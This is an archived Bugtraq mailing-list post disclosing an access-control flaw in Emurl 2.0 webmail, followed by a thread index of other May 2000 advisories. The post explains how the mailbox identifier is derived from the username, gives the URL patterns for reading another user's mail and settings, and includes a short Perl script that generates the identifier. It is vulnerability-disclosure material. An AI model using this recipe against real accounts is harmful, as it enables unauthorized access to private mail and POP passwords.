Bugtraq mailing list archives
Vulnerability in EMURL-based e-mail providers
From: pbenoit () MAIL COM (Pierre Benoit)
Date: Mon, 15 May 2000 12:33:23 -0400
Affected Product: Emurl 2.0 For Windows NT 4.0 (possibly others) Product information: Emurl is web-based email host developped by SeattleLab. http://www1.seattlelab.com/emurl/ Impact: Users can access the mailbox's content of anybody on the system. They can also steal their POP passwords since Emurl allows you to fetch your POP email from more than one source. Description: After logging into my new mail account powered by the Emurl software, this URL struck me: http://www.somesite.com/scripts/emurl/RECMAN.dll?TYPE=RECIEVEMAIL&USER=113100104114116111123 I guess you all know where this is going. First, this identifier is based solely on your account name. Therefore, if you create an account with the same name on another site, you'll end up with the very same identifier. Furthermore, this identifier can easily be determined since it is "encoded" using the ascii value of each character of the account's name and incremented by its position. In this example, my user ID would be PBenoit and my resulting identifier would be 113100104114116111123. p = 112 + 1 = 113 b = 98 + 2 = 100 e = 101 + 3 = 104 n = 110 + 4 = 114 o = 111 + 5 = 116 i = 105 + 6 = 111 t = 116 + 7 = 123 You could fetch the e-mails here <A HREF="http://www.somesite.com/scripts/emurl/RECMAN.dll?TYPE=RECIEVEMAIL&USER=<identifier">http://www.somesite.com/scripts/emurl/RECMAN.dll?TYPE=RECIEVEMAIL&USER=<identifier</A>> ... and view/change the account's settings here <A HREF="http://www.somesite.com/scripts/emurl/MAKEHTML_M.dll?TYPE=USER&USER=<identifier">http://www.somesite.com/scripts/emurl/MAKEHTML_M.dll?TYPE=USER&USER=<identifier</A>> I threw a few lines of perl together to generate this. print "Enter your ID: "; $_=lc(<STDIN>); chomp; print "Your identifier is: "; @letters=split(//, $_); for ($i = 0; $i < length($_); $i++) { $mychar = ord($letters[$i])+$i+1; if ($mychar < 100) { $mychar = (0).$mychar;} print $mychar } Vendor status: SeattleLab is aware and the issue is addressed in their next version. ______________________________________________ FREE Personalized Email at Mail.com Sign up at http://www.mail.com/?sr=signup
Current thread:
- ISSalert: Internet Security Systems Security Advisory: Microsoft IIS Remote Denial of Service Attack, (continued)
- ISSalert: Internet Security Systems Security Advisory: Microsoft IIS Remote Denial of Service Attack Warren Barrow (May 11)
- Remote DoS attack in Internet Information Server 4.0 & 5.0 "Malformed Extension Data in URL" Vulnerability Ussr Labs (May 11)
- Microsoft Security Bulletin (MS00-030) Microsoft Product Security (May 11)
- IE Domain Confusion Vulnerability Foo Bar (May 11)
- Overflow in Outlook Express 4.* - too long filenames with graphic format extension Ultor (May 12)
- Eudora Sensitive to Long Filenames Ron Moritz (May 18)
- IE Domain Confusion Vulnerability is an Email problem also Richard M. Smith (May 12)
- Re: IE Domain Confusion Vulnerability doesn't matter much Marc Slemko (May 12)
- Re: IE Domain Confusion Vulnerability doesn't matter much Richard M. Smith (May 15)
- Vulnerability in CGI counter 4.0.7 by George Burgyan Howard M. Kash III (May 15)
- Vulnerability in EMURL-based e-mail providers Pierre Benoit (May 15)
- New Solaris root exploit for /usr/lib/lp/bin/netpr Anonymous (May 12)
- Microsoft Security Bulletin (MS00-034) Microsoft Product Security (May 12)
- Microsoft Office 2000 Advisory dildog (May 12)